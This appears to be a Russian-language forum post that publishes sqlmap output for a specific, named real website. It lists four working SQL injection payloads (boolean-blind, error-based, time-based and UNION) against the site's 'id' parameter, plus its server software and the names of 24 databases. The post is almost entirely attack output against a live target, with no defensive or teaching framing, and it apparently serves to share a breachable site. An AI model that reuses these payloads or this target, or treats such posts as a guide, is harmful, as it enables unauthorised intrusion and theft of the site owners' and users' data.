06.10.2017, 00:03
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
С нами:
6685526
Репутация:
0
|
|
http://mycompaniesact.com/orders.php?id=401
Код:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=401' AND 5514=5514 AND 'bTax'='bTax
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
available databases [24]:[*] cashflow[*] cashflowblog[*] cim[*] complyzone[*] complyzoneblog[*] gstcomplyzone[*] gstseekho[*] gstseekhoapp[*] information_schema[*] mppcos[*] mycompaniesact[*] mycompaniesact_blog[*] mysql[*] performance_schema[*] permier[*] phpmyadmin[*] punitecom[*] rishab[*] sammiraman[*] ssluthra[*] trackmyinvoice[*] uniqueshiksha[*] unocalecom[*] Vendor_Payment_Generation
|
|
|